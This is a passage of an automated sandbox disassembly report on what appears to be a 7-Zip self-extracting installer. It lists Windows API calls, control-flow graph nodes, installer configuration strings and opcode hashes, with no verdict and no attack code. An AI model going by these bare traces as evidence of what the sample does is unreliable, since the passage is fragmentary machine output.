                                                                            • GetFileAttributesW.KERNEL32(?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00419810), ref: 00406716
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000,AutoInstall,?,?,00419810), ref: 004067D0
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,AutoInstall,?,?,00419810), ref: 004067D8
                                                                            • _wtol.MSVCRT ref: 0040686C
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?,?,?,?), ref: 00406A4B
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?,?,?,?,?), ref: 00406A53
                                                                              • Part of subcall function 00404F67: memset.MSVCRT ref: 00404F8B
                                                                              • Part of subcall function 00404F67: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,00000000), ref: 00404FE4
                                                                              • Part of subcall function 00404F67: ??3@YAXPAX@Z.MSVCRT(00000002,?), ref: 00404FEC
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00406A77
                                                                              • Part of subcall function 004023B5: LoadLibraryA.KERNEL32(kernel32,Wow64RevertWow64FsRedirection,00406A9D,00000000,?,?), ref: 004023C8
                                                                              • Part of subcall function 004023B5: GetProcAddress.KERNEL32(00000000), ref: 004023CF
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?), ref: 00406AC0
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 00406AC8
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 00406AD0
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?), ref: 00406AD6
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00406B60
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000001,00000010,?), ref: 00406B81
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000001,00000010,?), ref: 00406B89
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000001,00000010,?), ref: 00406B91
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000001,00000010,?), ref: 00406B97
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000001,00000010,?), ref: 00406B9F
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000001,00000010,?), ref: 00406BA7
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000001,00000010,?), ref: 00406BAF
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?), ref: 00406BCE
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 00406BD6
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 00406BDE
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?), ref: 00406BE4
                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000000,?,?), ref: 00406C1D
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 00406C47
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,0000000A), ref: 00406253
                                                                              • Part of subcall function 00407CE8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00407D48
                                                                              • Part of subcall function 00407CE8: ??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 00407D50
                                                                              • Part of subcall function 00407A5B: ??3@YAXPAX@Z.MSVCRT(?,00408571,00000002,00000000,00419810), ref: 00407A64
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 00406D0B
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 00406D13
                                                                            • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,?), ref: 00406D2A
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 00406D3E
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 00406D46
                                                                            • MessageBoxA.USER32(00000000,Sorry, this program requires Microsoft Windows 2000 or later.,7-Zip SFX,00000010), ref: 00406D5F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: ??3@$_wtol$lstrlen$Message$??2@CommandCurrentFileLineModuleProcessTimer$?_set_new_handler@@AddressAttributesCallbackCreateDirectoryDispatchDispatcherHandleInitializeKillLibraryLoadNameProcSizeStateUserVersionWindowWorking_wcsnicmpmemsetwsprintf
                                                                            • String ID: " -$7-Zip SFX$7ZipSfx.%03x$7zSfxString%d$8sa$AutoInstall$BeginPrompt$BeginPromptTimeout$Delete$ExecuteFile$ExecuteParameters$FinishMessage$GUIFlags$GUIMode$HelpText$InstallPath$MiscFlags$OverwriteMode$RunProgram$SelfDelete$SetEnvironment$Shortcut$Sorry, this program requires Microsoft Windows 2000 or later.$amd64$bpt$del$forcenowait$hidcon$i386$nowait$setup.exe$sfxconfig$sfxelevation$sfxversion$sfxwaitall$shc$waitall$x64$x86
                                                                            • API String ID: 1141480454-2787303648
                                                                            • Opcode ID: 61b6db2cf502f6cdb9ed3d8ef88f85430eec8f3b8d6da4354540e32e0b52767e
                                                                            • Instruction ID: 2089f84092e6f9dd7ccb59dec8b65dd0323b364c678a6dd427d939ae7de33dee
                                                                            • Opcode Fuzzy Hash: 61b6db2cf502f6cdb9ed3d8ef88f85430eec8f3b8d6da4354540e32e0b52767e
                                                                            • Instruction Fuzzy Hash: 0ED2B071900205AADF25BF61DC46AEE37A8EF50308F10803BF906B62D1DB7D9996CB5D

                                                                            Control-flow Graph (rendered graph omitted; nodes marked Executed / Not Executed; function entry block at 401815)
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2eb857db419b6fef2d9b531affdfec99765c4fe0b30ebfa56ff95b369c608ec5
                                                                            • Instruction ID: a60b5a69a01ec9efe61fd2c0eaeb1ac451c96722a8658d603a3df3c815bca288
                                                                            • Opcode Fuzzy Hash: 2eb857db419b6fef2d9b531affdfec99765c4fe0b30ebfa56ff95b369c608ec5
                                                                            • Instruction Fuzzy Hash: 81B18D71900209EFCB15EFA5D8819EEB7B5FF44314B10842BF412BB2E1DB39A946CB58

                                                                            Control-flow Graph (rendered graph omitted; nodes marked Executed / Not Executed; function entry block at 40236f)
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(kernel32,GetNativeSystemInfo,?,?,?,?,?,004023A5,00405BA0,00419858,00419858), ref: 0040237F
                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00402386
                                                                            • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,004023A5,00405BA0,00419858,00419858), ref: 00402394
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: AddressInfoLibraryLoadNativeProcSystem
                                                                            • String ID: GetNativeSystemInfo$kernel32
                                                                            • API String ID: 2103483237-3846845290
                                                                            • Opcode ID: a94058319a2387ce573cbdccf1dcafea5043f54207b6f02b0e86712a059d6701
                                                                            • Instruction ID: a8ef7632441d972feee251461dd82ff97bfeab42fd74a07c16b34688063011c9
                                                                            • Opcode Fuzzy Hash: a94058319a2387ce573cbdccf1dcafea5043f54207b6f02b0e86712a059d6701
                                                                            • Instruction Fuzzy Hash: 8FD05E70B00A08B6CB11ABB56D0ABDB32F959886487540461A802F00C0EAFCDD80C368

                                                                            Control-flow Graph (rendered graph omitted; nodes marked Executed / Not Executed; function entry block at 403387)
                                                                            APIs
                                                                            • GetFileAttributesW.KERNELBASE(?,-00000001), ref: 00403395
                                                                            • SetLastError.KERNEL32(00000010), ref: 004033AA
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: AttributesErrorFileLast
                                                                            • String ID:
                                                                            • API String ID: 1799206407-0
                                                                            • Opcode ID: 9fcf262d0011693808f1a8ae36353e57a3cd3c7d334706e154b09c6bb7c8a146
                                                                            • Instruction ID: bf2ef4a5338da23da25cb7262d028f8c999e3ef8181ecb362b3a9c4d4c50f47e
                                                                            • Opcode Fuzzy Hash: 9fcf262d0011693808f1a8ae36353e57a3cd3c7d334706e154b09c6bb7c8a146
                                                                            • Instruction Fuzzy Hash: 2F01A231510914ABDB111F789C8D6DA3B5CAF4132AF504632FD26F11E0DB38DB069A5D
                                                                            APIs
                                                                            • GetDiskFreeSpaceExW.KERNELBASE(?,00000000,00000000), ref: 004011ED
                                                                            • SendMessageW.USER32(00008001,00000000,?), ref: 00401246
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: DiskFreeMessageSendSpace
                                                                            • String ID:
                                                                            • API String ID: 696007252-0
                                                                            • Opcode ID: c4409eea25fa902e72ed841aea0622abf6309c0a7110b39fd0afdcd0313368d3
                                                                            • Instruction ID: 6bce3cc04fac88c0623c077a1f6ff58a39868f34b7b8d3af9ac8bc0393cf14a7
                                                                            • Opcode Fuzzy Hash: c4409eea25fa902e72ed841aea0622abf6309c0a7110b39fd0afdcd0313368d3
                                                                            • Instruction Fuzzy Hash: C5018B30220205FBEB10AF50EC89F9A37A8EB01300F1084BAF514F91E0DBB9AC408B1D

                                                                            Control-flow Graph (rendered graph omitted; nodes marked Executed / Not Executed; function entry block at 403400)
                                                                            APIs
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,004193C0,00000000), ref: 00403489
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,004193C0,00000000), ref: 00403491
                                                                            • ??3@YAXPAX@Z.MSVCRT(0040470C,?), ref: 004036B7
                                                                              • Part of subcall function 0040269A: ??3@YAXPAX@Z.MSVCRT(?,-00000008,00404A32,?,?,?), ref: 004026A0
                                                                              • Part of subcall function 0040269A: ??3@YAXPAX@Z.MSVCRT(?,?,-00000008,00404A32,?,?,?), ref: 004026A7
                                                                            • ??3@YAXPAX@Z.MSVCRT(0040470C,?,?,00000000,00000000,004193C0,00000000), ref: 004036E4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: ??3@
                                                                            • String ID: 0VA$SetEnvironment${\rtf
                                                                            • API String ID: 613200358-2390373888
                                                                            • Opcode ID: dcf90fe6618ce088b1c97014d150c8774d1fa3f0332cc52eb9164848a73b118e
                                                                            • Instruction ID: 87565cb6d8bbb35d5cc273a3f84cdf02fa03a2bcc309534b5b5a97bb7c5f0c64
                                                                            • Opcode Fuzzy Hash: dcf90fe6618ce088b1c97014d150c8774d1fa3f0332cc52eb9164848a73b118e
                                                                            • Instruction Fuzzy Hash: 9891BD31D00208BBDF21AFA1DD51AEE7BB8AF14309F20407BE841772E1DA795B06DB49

                                                                            Control-flow Graph

                                                                            control_flow_graph 931 404f67-404fac call 401458 * 2 memset 936 404fb8-404fbc 931->936 937 404fae-404fb1 931->937 938 404fc5-404fdf call 404a97 call 401370 936->938 939 404fbe 936->939 937->936 944 404fe1-404fe9 ??3@YAXPAX@Z 938->944 945 404ffa-405012 ShellExecuteExW 938->945 939->938 946 404fec-404ff9 ??3@YAXPAX@Z 944->946 947 405014-40501b 945->947 948 40503a-40503c 945->948 949 405028-40502b CloseHandle 947->949 950 40501d-405022 WaitForSingleObject 947->950 951 405031-405038 ??3@YAXPAX@Z 948->951 949->951 950->949 951->946
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00404F8B
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,00000000), ref: 00404FE4
                                                                            • ??3@YAXPAX@Z.MSVCRT(00000002,?), ref: 00404FEC
                                                                            • ShellExecuteExW.SHELL32(?), ref: 0040500A
                                                                            • WaitForSingleObject.KERNEL32(00406A69,000000FF), ref: 00405022
                                                                            • CloseHandle.KERNEL32(00406A69), ref: 0040502B
                                                                            • ??3@YAXPAX@Z.MSVCRT(?), ref: 00405032
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: ??3@$CloseExecuteHandleObjectShellSingleWaitmemset
                                                                            • String ID: $gA
                                                                            • API String ID: 2700081640-3949116232
                                                                            • Opcode ID: 7a72f8255ffad39a45084592af3b4b21038dbbce693df37f494211c98472705d
                                                                            • Instruction ID: ed471f47135b1f40d8481ce0364afbd0fdc4c640c0e5737cceb289ed8d9b0336
                                                                            • Opcode Fuzzy Hash: 7a72f8255ffad39a45084592af3b4b21038dbbce693df37f494211c98472705d
                                                                            • Instruction Fuzzy Hash: 0A218071C00249ABDF11EFD5D8459DEBBB8EF44318F10812BF915762A0DB785949CF58

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D2D
                                                                            • CreateWindowExW.USER32(00000000,Static,004154C8,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00401D4A
                                                                            • SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00401D5C
                                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00401D69
                                                                            • DispatchMessageW.USER32(?), ref: 00401D73
                                                                            • KillTimer.USER32(00000000,00000001,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D7C
                                                                            • KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D83
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: MessageTimer$CallbackCreateDispatchDispatcherHandleKillModuleUserWindow
                                                                            • String ID: Static
                                                                            • API String ID: 2479445380-2272013587
                                                                            • Opcode ID: 9176f2b3be156760845f27d0c503cf1f669651295b521d97bc39be25fea497be
                                                                            • Instruction ID: 383de423edee8b1f15e14e65255527aef4da18b75050025dbc481d2ec4aca0b1
                                                                            • Opcode Fuzzy Hash: 9176f2b3be156760845f27d0c503cf1f669651295b521d97bc39be25fea497be
                                                                            • Instruction Fuzzy Hash: 51F0F432542925BBDA2127659C4DFDF3E2CDFC6B72F104161F619E50D0DAB84041CAF9

                                                                            Control-flow Graph

                                                                            control_flow_graph 955 4036f1-403717 lstrlenW call 402771 958 403722-40372e 955->958 959 403719-40371d call 401172 955->959 961 403730-403734 958->961 962 403736-40373c 958->962 959->958 961->962 963 40373f-403741 961->963 962->963 964 403765-40376e call 401b75 963->964 967 403770-403783 GetSystemTimeAsFileTime GetFileAttributesW 964->967 968 403754-403756 964->968 971 403785-403793 call 403387 967->971 972 40379c-4037a5 call 401b75 967->972 969 403743-40374b 968->969 970 403758-40375a 968->970 969->970 977 40374d-403751 969->977 973 403760 970->973 974 403814-40381a 970->974 971->972 985 403795-403797 971->985 986 4037b6-4037b8 972->986 987 4037a7-4037b4 call 408dbf 972->987 973->964 981 403844-403857 call 408dbf ??3@YAXPAX@Z 974->981 982 40381c-403827 974->982 977->970 978 403753 977->978 978->968 998 403859-40385d 981->998 982->981 983 403829-40382d 982->983 983->981 989 40382f-403834 983->989 993 403839-403842 ??3@YAXPAX@Z 985->993 990 403808-403812 ??3@YAXPAX@Z 986->990 991 4037ba-4037d9 memcpy 986->991 987->985 989->981 995 403836-403838 989->995 990->998 996 4037db 991->996 997 4037ee-4037f2 991->997 993->998 995->993 999 4037ed 996->999 1000 4037f4-403801 call 401b75 997->1000 1001 4037dd-4037e5 997->1001 999->997 1000->987 1005 403803-403806 1000->1005 1001->1000 1002 4037e7-4037eb 1001->1002 1002->999 1002->1000 1005->990 1005->991
                                                                            APIs
                                                                            • lstrlenW.KERNEL32(004017CF,00000000,?,?,?,?,?,?,004017CF,?), ref: 004036FE
                                                                            • GetSystemTimeAsFileTime.KERNEL32(?,004017CF,?,?,?,?,004017CF,?), ref: 00403774
                                                                            • GetFileAttributesW.KERNELBASE(?,?,?,?,?,004017CF,?), ref: 0040377B
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,004017CF,?,?,?,?,004017CF,?), ref: 0040383A
                                                                              • Part of subcall function 00401172: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,0040146C,00000003,?,004057B0,?,00000000), ref: 00401192
                                                                              • Part of subcall function 00401172: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,0040146C,00000003,?,004057B0,?,00000000), ref: 004011B8
                                                                            • memcpy.MSVCRT(-00000001,004017CF,?,?,?,?,?,004017CF,?), ref: 004037CC
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,004017CF,?), ref: 00403809
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000001,0000000C,004017CF,004017CF,?,?,?,?,004017CF,?), ref: 0040384F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: ??3@$FileTime$??2@AttributesSystemlstrlenmemcpy
                                                                            • String ID:
                                                                            • API String ID: 846840743-0
                                                                            • Opcode ID: c5e686f7f8817ede9d702b9a32d8664ca79c34d2077dd9b3290cdad50fb96ab2
                                                                            • Instruction ID: 91e79cb9f272e0fc84db3cde8408d575c4b848c544f3ea2b05d11415b181eedc
                                                                            • Opcode Fuzzy Hash: c5e686f7f8817ede9d702b9a32d8664ca79c34d2077dd9b3290cdad50fb96ab2
                                                                            • Instruction Fuzzy Hash: 0841B6B6900211A6DB20BF598845BBFBABCEF41706F50813BF941B32C5D77C9A4282DD

                                                                            Control-flow Graph

                                                                            control_flow_graph 1006 40f227-40f26f _EH_prolog call 40ef4a 1009 40f271-40f274 1006->1009 1010 40f277-40f27a 1006->1010 1009->1010 1011 40f290-40f2b5 1010->1011 1012 40f27c-40f281 1010->1012 1015 40f2b7-40f2bd 1011->1015 1013 40f283-40f285 1012->1013 1014 40f289-40f28b 1012->1014 1013->1014 1016 40f6f3-40f704 1014->1016 1017 40f2c3-40f2c7 1015->1017 1018 40f387-40f39a call 4011d1 1015->1018 1019 40f2c9-40f2cc 1017->1019 1020 40f2cf-40f2de 1017->1020 1026 40f3b1-40f3d6 call 40e891 ??2@YAPAXI@Z 1018->1026 1027 40f39c-40f3a6 call 40ef85 1018->1027 1019->1020 1022 40f2e0-40f2f6 call 40f040 call 40f1fd call 40ce5c 1020->1022 1023 40f303-40f308 1020->1023 1043 40f2fb-40f301 1022->1043 1024 40f316-40f350 call 40f040 call 40f1fd call 40ce5c call 40f117 1023->1024 1025 40f30a-40f314 1023->1025 1029 40f353-40f369 1024->1029 1025->1024 1025->1029 1040 40f3e1-40f3fa call 40ef4a call 40dc14 1026->1040 1041 40f3d8-40f3df call 40dce7 1026->1041 1049 40f3aa-40f3ac 1027->1049 1037 40f36c-40f374 1029->1037 1042 40f376-40f385 call 40ef63 1037->1042 1037->1043 1059 40f3fd-40f420 call 40dc09 1040->1059 1041->1040 1042->1037 1043->1015 1049->1016 1063 40f422-40f427 1059->1063 1064 40f456-40f459 1059->1064 1067 40f429-40f42b 1063->1067 1068 40f42f-40f447 call 40f090 call 40ef85 1063->1068 1065 40f485-40f4a9 ??2@YAPAXI@Z 1064->1065 1066 40f45b-40f460 1064->1066 1072 40f4b4 1065->1072 1073 40f4ab-40f4b2 call 40f776 1065->1073 1069 40f462-40f464 1066->1069 1070 40f468-40f47e call 40f090 call 40ef85 1066->1070 1067->1068 1085 40f449-40f44b 1068->1085 1086 40f44f-40f451 1068->1086 1069->1070 1070->1065 1074 40f4b6-40f4cd call 40ef4a 1072->1074 1073->1074 1087 40f4db-40f500 call 40faff 1074->1087 1088 40f4cf-40f4d8 1074->1088 1085->1086 1086->1016 1092 40f502-40f507 1087->1092 1093 40f543-40f546 1087->1093 1088->1087 1096 40f509-40f50b 1092->1096 1097 40f50f-40f514 1092->1097 1094 40f54c-40f5a9 call 40f163 call 40f011 call 40e9ef 1093->1094 1095 40f6ae-40f6b3 1093->1095 1113 40f5ae-40f5b3 1094->1113 1098 40f6b5-40f6b6 1095->1098 1099 40f6bb-40f6df 1095->1099 1096->1097 1101 40f516-40f518 1097->1101 1102 40f51c-40f534 call 40f090 call 40ef85 1097->1102 1098->1099 1099->1016 1099->1059 1101->1102 1111 40f536-40f538 1102->1111 1112 40f53c-40f53e 1102->1112 1111->1112 1112->1016 1114 40f615-40f61b 1113->1114 1115 40f5b5 1113->1115 1117 40f621-40f623 1114->1117 1118 40f61d-40f61f 1114->1118 1116 40f5b7 1115->1116 1119 40f5ba-40f5c3 call 40faac 1116->1119 1120 40f5c5-40f5c7 1117->1120 1121 40f625-40f631 1117->1121 1118->1116 1119->1120 1131 40f602-40f604 1119->1131 1123 40f5c9-40f5ca 1120->1123 1124 40f5cf-40f5d1 1120->1124 1125 40f633-40f635 1121->1125 1126 40f637-40f63d 1121->1126 1123->1124 1128 40f5d3-40f5d5 1124->1128 1129 40f5d9-40f5f1 call 40f090 call 40ef85 1124->1129 1125->1119 1126->1099 1130 40f63f-40f645 1126->1130 1128->1129 1129->1049 1139 40f5f7-40f5fd 1129->1139 1130->1099 1133 40f606-40f608 1131->1133 1134 40f60c-40f610 1131->1134 1133->1134 1134->1099 1139->1049
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 0040F230
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000038,00000001), ref: 0040F3CE
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000038,00000000,00000001), ref: 0040F4A1
                                                                              • Part of subcall function 0040F776: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,?,0040F4B2,00000000,00000001), ref: 0040F79E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: ??2@$H_prolog
                                                                            • String ID: pmA${D@
                                                                            • API String ID: 3431946709-901781089
                                                                            • Opcode ID: 5f2616ad24b74ab3b3c53048b37fa2c0e98c535542d0e7834049dc9cf8634cb0
                                                                            • Instruction ID: 4b0d62aee0caa64fe906b0c8bb83bc11348460c21612f4a75cf9423b72749376
                                                                            • Opcode Fuzzy Hash: 5f2616ad24b74ab3b3c53048b37fa2c0e98c535542d0e7834049dc9cf8634cb0
                                                                            • Instruction Fuzzy Hash: 27F14971600209DFCB24DF65C884AAA77E5BF48314F24417AFC15AB7A2DB39EC4ACB54

                                                                            Control-flow Graph

                                                                            control_flow_graph 1142 401b75-401b84 CreateDirectoryW 1143 401bb6-401bba 1142->1143 1144 401b86-401b93 GetLastError 1142->1144 1145 401ba0-401bad GetFileAttributesW 1144->1145 1146 401b95 1144->1146 1145->1143 1148 401baf-401bb1 1145->1148 1147 401b96-401b9f SetLastError 1146->1147 1148->1143 1149 401bb3-401bb4 1148->1149 1149->1147
                                                                            APIs
                                                                            • CreateDirectoryW.KERNELBASE(k7@,00000000,-00000001,0040376B,?,004017CF,?,?,?,?,004017CF,?), ref: 00401B7C
                                                                            • GetLastError.KERNEL32(?,?,?,?,004017CF,?), ref: 00401B86
                                                                            • SetLastError.KERNEL32(000000B7,?,?,?,?,004017CF,?), ref: 00401B96
                                                                            • GetFileAttributesW.KERNELBASE(?,?,?,?,?,004017CF,?), ref: 00401BA4
